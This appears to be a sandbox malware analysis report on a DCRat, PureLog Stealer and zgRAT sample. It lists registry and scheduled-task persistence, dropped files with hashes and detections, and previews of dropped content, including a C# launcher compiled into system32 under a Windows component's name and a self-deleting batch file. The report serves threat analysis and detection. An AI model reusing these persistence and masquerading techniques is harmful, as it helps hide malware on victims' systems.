                                                                                                                                  12:17:16AutostartRun: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Svchost c:\windows\resources\svchost.exe RO
                                                                                                                                  12:17:23Task SchedulerRun new task: DHqwUEpsrWozPqmBWAUuPmQlLJtKzj path: "C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe"
                                                                                                                                  12:17:23Task SchedulerRun new task: DHqwUEpsrWozPqmBWAUuPmQlLJtKzjD path: "C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe"
                                                                                                                                  12:17:24Task SchedulerRun new task: Idle path: "C:\blockcomSession\Idle.exe"
                                                                                                                                  12:17:24Task SchedulerRun new task: IdleI path: "C:\blockcomSession\Idle.exe"
                                                                                                                                  12:17:24Task SchedulerRun new task: smss path: "C:\blockcomSession\smss.exe"
                                                                                                                                  12:17:24Task SchedulerRun new task: smsss path: "C:\blockcomSession\smss.exe"
                                                                                                                                  12:17:25AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Idle "C:\blockcomSession\Idle.exe"
                                                                                                                                  12:17:27Task SchedulerRun new task: containerReview path: "C:\blockcomSession\containerReview.exe"
                                                                                                                                  12:17:27Task SchedulerRun new task: containerReviewc path: "C:\blockcomSession\containerReview.exe"
                                                                                                                                  12:17:33AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run DHqwUEpsrWozPqmBWAUuPmQlLJtKzj "C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe"
                                                                                                                                  12:17:41AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run smss "C:\blockcomSession\smss.exe"
                                                                                                                                  12:17:50AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run containerReview "C:\blockcomSession\containerReview.exe"
                                                                                                                                  12:17:58AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Idle "C:\blockcomSession\Idle.exe"
                                                                                                                                  12:18:06AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run DHqwUEpsrWozPqmBWAUuPmQlLJtKzj "C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe"
                                                                                                                                  12:18:15AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run smss "C:\blockcomSession\smss.exe"
                                                                                                                                  12:18:24AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run containerReview "C:\blockcomSession\containerReview.exe"
                                                                                                                                  12:18:32AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run Idle "C:\blockcomSession\Idle.exe"
                                                                                                                                  12:18:41AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run DHqwUEpsrWozPqmBWAUuPmQlLJtKzj "C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe"
                                                                                                                                  12:18:49AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run smss "C:\blockcomSession\smss.exe"
                                                                                                                                  12:18:58AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run containerReview "C:\blockcomSession\containerReview.exe"
                                                                                                                                  12:19:15AutostartRun: WinLogon Shell "C:\blockcomSession\Idle.exe"

                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                  IPs

                                                                                                                                  No context

                                                                                                                                  Domains

                                                                                                                                  No context

                                                                                                                                  ASNs

                                                                                                                                  No context

                                                                                                                                  JA3 Fingerprints

                                                                                                                                  No context

                                                                                                                                  Dropped Files

                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                  C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exefatality.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exefatality.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                      C:\Users\user\Desktop\FJTVnRjh.logSearchIndexer.exeGet hashmaliciousDCRat, Neshta, PureLog Stealer, zgRATBrowse
                                                                                                                                        fatality.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                          OneDriveStandaloneUpdater.exeGet hashmaliciousDCRatBrowse
                                                                                                                                            VIyu4dC9CU.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                              OisrvsB6Ea.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                ntoskrnl2.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                  top.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                    DC86.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                      WinPerfcommon.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                        Udzp7lL5ns.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse

                                                                                                                                                          Created / dropped Files

                                                                                                                                                          C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\blockcomSession\containerReview.exe
                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):2006016
                                                                                                                                                          Entropy (8bit):7.565400810273061
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24576:Ens6R8MzM9PKio0d/wAJqc47Z9CN1rgtq1DBukkM3vCRj8Joo4ytx605H3uG2nkZ:EaocGZcrgtq1NVkMfko4u6EL29qN
                                                                                                                                                          MD5:F568E43BC473CD8CEB2553C58194DF61
                                                                                                                                                          SHA1:14C0FFF25EDFD186DAB91EE6BCC94450C9BED84D
                                                                                                                                                          SHA-256:C91375814E8A5BB71736CE61FA429BC7B98A2B7B2A254B9967C51F3FCCFACD52
                                                                                                                                                          SHA-512:47CF66CE90FECD147077C72DC3F06DB2199B9BC96E887915D6B0D4BFEA7577D60A7345DA6E5BC59967D02528FBDF6C8BF86233261338F782B9185C890FBC400E
                                                                                                                                                          Malicious:true
                                                                                                                                                          Yara Hits:
                                                                                                                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe, Author: Joe Security
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 83%
                                                                                                                                                          • Antivirus: Virustotal, Detection: 77%, Browse
                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                          • Filename: fatality.exe, Detection: malicious, Browse
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f................................. ........@.. ....................................@....................................K....... ............................................................................ ............... ..H............text...$.... ...................... ..`.rsrc... ...........................@....reloc..............................@..B........................H.........................\...M........................................0..........(.... ........8........E....*.......N...)...8%...(.... ....~p...{c...9....& ....8....*(.... ....~p...{y...:....& ....8....(.... ....~p...{....9....& ....8y......0.......... ........8........E....1...............V...8,.......~....(E...~....(I... ....?.... ....8.......... ....~p...{m...:....& ....8....~....(=... .... .... ....s....~....(A....... ....~p...{....9Q...& ....8F...r...ps....z*~....:..

                                                                                                                                                          C:\Program Files\Mozilla Firefox\fonts\c0a39dc94da3cf

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\blockcomSession\containerReview.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (947), with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):947
                                                                                                                                                          Entropy (8bit):5.911830657087546
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:3AYhIwXcKyIMLVx0giSm5bbrmpivt9BTGSut8C3:3AYHXVyFX0giSkHmpivtDySuKC3
                                                                                                                                                          MD5:7C966539B6DF88CFF8BAB45F74B21CEB
                                                                                                                                                          SHA1:7F5E1D4CE2DB7E2FD6A504B55BE76594FAEA6722
                                                                                                                                                          SHA-256:DE0E0F0A41284DB32A404B87DABCAAB4B2AAFE6F6917F70731C98DEA12FC6B13
                                                                                                                                                          SHA-512:90EF1C4EC6292D766FFA0B26DAE741CEBB425A298D3F517062415DF4ED040E68EC397D5C0AA3560BB0E6AC5CE40AE3D5C5E7B47270E09AA44D442AF7E049717E
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:u1VBLdauyTrQLgzcdeeSuqcyvxfdq8Uu6g9WyhbTetsx0fYTj2w41KMDZgPY76Ez86Togdn5CLyB8p8QYM4xMa2wU56SSDVho3y3LtwFO01qVKFti89vBRmiDgUkgVm8zQXF1EFoZyiViMaK0MuTEjfXQPzoZMj2N31FxA2d3UWNsQA1GJuTlT4PuAzlOaONOpIpUVW0TQatNSo9P8iQcQQ48lUxLRPcFJ8CIVguw39V3LCcVzWQ28u8ZNqtBjpCA7nDUl04bxdiQ5Bxj2bV59kHY9n5oxsMO7U5h8Ht9bzEfMsdM3JJIUHBXgpU85PnFQUTkFPkurWdJflMRJtvnjE4zSiBTwvEML9P1Y3GnjZa7n114cDyLeAfLadRgNR76RR8gWU2QmHEKn6MaqH1t72rKdDb5ljZRbeqW3ViHLhjW5VheR0zGaO8ZjxCS36pCrwsJQzhVithZSUPIf6ouuT1NfQwFSPNP2hpJmYObSehqqjHPi4w6S4SY5en9CcCSgSgvpFfHsMbPvKh6JhgYdQ68PQOIuOY0bPKYDVjcZoOFcCmu7r0f5ozPVhgY1XWexlygAI2x8E9yC1gMndKDY35wZ5CfzKkBStR0OGtyyCg0pAMeBTvYNTG4pBGFGX8xd7gSjp8huVOVWEHYsiefZMy8nXLM9osbEtWse44VVNo1Fuhl4rXi3cYRIhoLewhFnwQnrY4ynIKLi7330jRSRKimUFj6Pt0jqiOSd33fxi4uRMtLovV4ePycOoTmy7i4Rlf9slZ7qvfsPyUHWYSdY5EbtvDykRrzAAcqrtcDVXOsuGMaULQapEgWgDQ7hkXZEpsPVoam6PIArWqnineYAQJ5dGJndffvAznEX7Epvnea6goKXmY4F8YxfxwPfwJauX91smQliznXwt87b8Q1HkpCb0ikKzK8eDqjgxcuVwWQUAAwyy

                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe.log

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe
                                                                                                                                                          File Type:CSV text
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):847
                                                                                                                                                          Entropy (8bit):5.354334472896228
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                                                                                                          MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                                                                                          SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                                                                                          SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                                                                                                          SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\containerReview.exe.log

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\blockcomSession\containerReview.exe
                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1396
                                                                                                                                                          Entropy (8bit):5.350961817021757
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNrJE4qtE4KlOU4mZsXE4Npv:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHKu
                                                                                                                                                          MD5:EBB3E33FCCEC5303477CB59FA0916A28
                                                                                                                                                          SHA1:BBF597668E3DB4721CA7B1E1FE3BA66E4D89CD89
                                                                                                                                                          SHA-256:DF0C7154CD75ADDA09758C06F758D47F20921F0EB302310849175D3A7346561F
                                                                                                                                                          SHA-512:663994B1F78D05972276CD30A28FE61B33902D71BF1DFE4A58EA8EEE753FBDE393213B5BA0C608B9064932F0360621AF4B4190976BE8C00824A6EA0D76334571
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\0hr0ztmo\0hr0ztmo.0.cs

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\blockcomSession\containerReview.exe
                                                                                                                                                          File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):374
                                                                                                                                                          Entropy (8bit):4.89520453047671
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6:V/DBXVgtSaIb2Lnf+eG6L2F0T7bfwlxFK8wM2Lnf+eG6L2NHOaiFK8wQAv:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBLSb
                                                                                                                                                          MD5:6231949DB938DE71D60D3564C03A7940
                                                                                                                                                          SHA1:FCEAA74521738C6A563CC0574D5F22F993671962
                                                                                                                                                          SHA-256:88FCEF55DEA97CCF670FBBE26F9C4B48B142BDD1031EC75B955E3252E7A8841D
                                                                                                                                                          SHA-512:34B9686BFD214A5A31625F3F57A944CFA583A3D8DAE756269E949B0DF10965581C35B55A85ED484053E3781A863C247B328E61413C6439B1DFBC1300CB8E6F20
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\blockcomSession\Idle.exe"); } catch { } }).Start();. }.}.

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\0hr0ztmo\0hr0ztmo.cmdline

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\blockcomSession\containerReview.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):250
                                                                                                                                                          Entropy (8bit):5.056548111562771
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8owkn23f7s2vWQDH:Hu7L//TRq79cQWfTBH
                                                                                                                                                          MD5:A3718BF142205516D59110195A695E24
                                                                                                                                                          SHA1:93CFF628D10AC5B485999CF32BF95930CEA32C25
                                                                                                                                                          SHA-256:AA21D707E7389617AC9C0E27F589DB4D3D97DC358AB90B20772655ED6764DE4E
                                                                                                                                                          SHA-512:342269C2DAFEBBF9CA92CC54521B56380D6C22D6C366CD8DA5142477BECFA6BBF292AA102087C6C6DEB634688F10197A5A1D1C1BA1B4137418577993BE5D7E98
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\0hr0ztmo\0hr0ztmo.0.cs"

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\0hr0ztmo\0hr0ztmo.out

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\blockcomSession\containerReview.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (325), with CRLF, CR line terminators
                                                                                                                                                          Category:modified
                                                                                                                                                          Size (bytes):746
                                                                                                                                                          Entropy (8bit):5.245831370226225
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12:lI/u7L//TRq79cQWfTBOKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:lI/un/Vq79tWfTUKax5DqBVKVrdFAMBt
                                                                                                                                                          MD5:F7C12B33AD8A8850FDCE1C01542A428F
                                                                                                                                                          SHA1:F5F247A59E288C5C11749258976A316611B86385
                                                                                                                                                          SHA-256:A6E6F2F6884E7AF955DE1E1E1AA2B628D205820CC21B87EF3E93B40EEB4B4ACD
                                                                                                                                                          SHA-512:19559425F54056589FDD457782ED0CBBC1A03283D7C7DBAD247471CFB455FCF0C1A0884FC0E27E2C7620DCAA57EA35F464A3487B450934D4AAEF0BB2A7C20167
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.C:\blockcomSession> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\0hr0ztmo\0hr0ztmo.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\Q048Q85hCW.bat

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\blockcomSession\containerReview.exe
                                                                                                                                                          File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):203
                                                                                                                                                          Entropy (8bit):5.091976395814207
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:mKDDVNGvT2XuFK+KdTVpM3No+HK9ATSV+jn9mionqQLNIvBktKcKZG1t+kiE2J5X:hCijTg3Nou1SV+DEBmvKOZG1wkn23ff
                                                                                                                                                          MD5:4CF2F62DE6CDA6A55D0F47066964A06F
                                                                                                                                                          SHA1:6895EC89ECC41D2CD00AF40AF36E3B802B7F9E2E
                                                                                                                                                          SHA-256:BBCE55184D6197320078586A9ABB4DC6E57FD516E338A9573B95651DCE71CD09
                                                                                                                                                          SHA-512:2B50E5C652ADAF9B3903D53076915058FFC6359F3AF4A902800682D310152C4D74E3A9E5D7504E6D8BC9BF8CFD1E5CD38CAB260710A3CFD5D758C3E86A8E291F
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                          Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\blockcomSession\smss.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\Q048Q85hCW.bat"

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\RESD8F5.tmp

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6e8, 10 symbols, created Mon Jan 13 13:17:26 2025, 1st section name ".debug$S"
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1952
                                                                                                                                                          Entropy (8bit):4.543503612091088
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:H7ZbW97Oi9/BDfHFWwKmwNyluxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0++UZ:fiF1l1KPMluOulajfqXSfbNtmh5Z
                                                                                                                                                          MD5:1F32A603BF296E0D3B947FA8F8A50482
                                                                                                                                                          SHA1:4EF1ABE0F7F40FD5CFA74A1796CE1E54E8EE9A08
                                                                                                                                                          SHA-256:263D9B57B936B32DCB058A733B034768FE040FE1B4BB714EFCD94BB7BB79F6DD
                                                                                                                                                          SHA-512:B364966FCEBD94BB0F3C06EEEF8039C4C1A5D57374C54EEA09AA351342698D3B4A87C3AEC66FE22FE5AC0A69840C6B20895E72C9ACBF28E930C09138C00F6994
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:L...f..g.............debug$S........8...................@..B.rsrc$01................d...........@..@.rsrc$02........p...x...............@..@........=....c:\Windows\System32\CSC8BED934F688E46C294B230B686E2243F.TMP.....................r.av..t.y..............4.......C:\Users\user\AppData\Local\Temp\RESD8F5.tmp.-.<....................a..Microsoft (R) CVTRES.Z.=..cwd.C:\blockcomSession.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe......................... .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\bCBPVtuahs

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\blockcomSession\containerReview.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):25
                                                                                                                                                          Entropy (8bit):4.213660689688185
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Q4zZqO0:3zkJ
                                                                                                                                                          MD5:7D1FF832E615CC3267E4F964D1F2686E
                                                                                                                                                          SHA1:5823228BB435382664BD50DEA6CD36F06F899AA8
                                                                                                                                                          SHA-256:70B18433166C75C4839F6EC4B9658AA0B01A81896894E7B0321BCFCDB15130CC
                                                                                                                                                          SHA-512:50B27346C3CC51DFA6C10B35A19AE96830ECE2E030E8EA2102D0DEE1DC8695F9C46A80DBB3E76AC759A54552921F5F02D583B490BE3066EF5C296228A18A0AB7
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:Zqzz0wY7iC6pM0223l2JtAKiP

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\~DF4D2C831197100227.TMP

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\Resources\spoolsv.exe
                                                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):5632
                                                                                                                                                          Entropy (8bit):1.0126942760400774
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6:rl91bxbtg/Ul+CFQXrUvltt9Xblt59Xh9XR5+1lf35X:rl3b/VFQrEPbltD7Ovf5
                                                                                                                                                          MD5:F10E5B486D7DBF6443F1DA41A2FCA7BF
                                                                                                                                                          SHA1:7731EBD181B21CF08DD3DC5B2459753A65B58873
                                                                                                                                                          SHA-256:F11E65F002A4876F68ACEEFCC4BFFD640B70347ECFE622392DA62716F601E7E6
                                                                                                                                                          SHA-512:8A90A253BBA99C6D3568BCD9BED0356A0EF9951131A6BD01C01A678C7F03760E8037B76278A085F18C4348EA2047C1F636D598B6011F21D1AB7FE9C596D78932
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\~DF5730D65F76C39388.TMP

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\Resources\spoolsv.exe
                                                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):5632
                                                                                                                                                          Entropy (8bit):1.0150719828554693
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6:rl91bxbtg/Ul+CFQXcKkStt9Xblt59Xh9XR5+1lf35X:rl3b/VFQcKkWbltD7Ovf5
                                                                                                                                                          MD5:37B8083CC26072B0F5B8358F7C6237E2
                                                                                                                                                          SHA1:A52EA0425506D3C8BE4E6F3D19B7DC51F614EA4F
                                                                                                                                                          SHA-256:FD9F07201AABA26ADE6016957ABD3010AC4B959C69676988B247C849C8D3BD29
                                                                                                                                                          SHA-512:25C1A49FC398F906D455BC1BEAE18BE951FE000CC30AAD9E49E4C08868607C73313985E84F1CEE39DF81C4EB614813B3CC9B390DC3220F56EC3308858AD05D48
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\~DF5B119369AD8DE51C.TMP

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\Resources\svchost.exe
                                                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):16384
                                                                                                                                                          Entropy (8bit):0.4022769148265937
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//Fl/Fllfl/t+lFldRJ:rl912N0xs+CFQXCB9Xh9Xh9XUlf35X
                                                                                                                                                          MD5:1E6AF6327736E3508F1C50506326C220
                                                                                                                                                          SHA1:6115ED14E9AAF178029EA70716D76FECB1469C6C
                                                                                                                                                          SHA-256:A941B5DA057560690B11153765184E0F92983148611048F3FDADA662054E0EFD
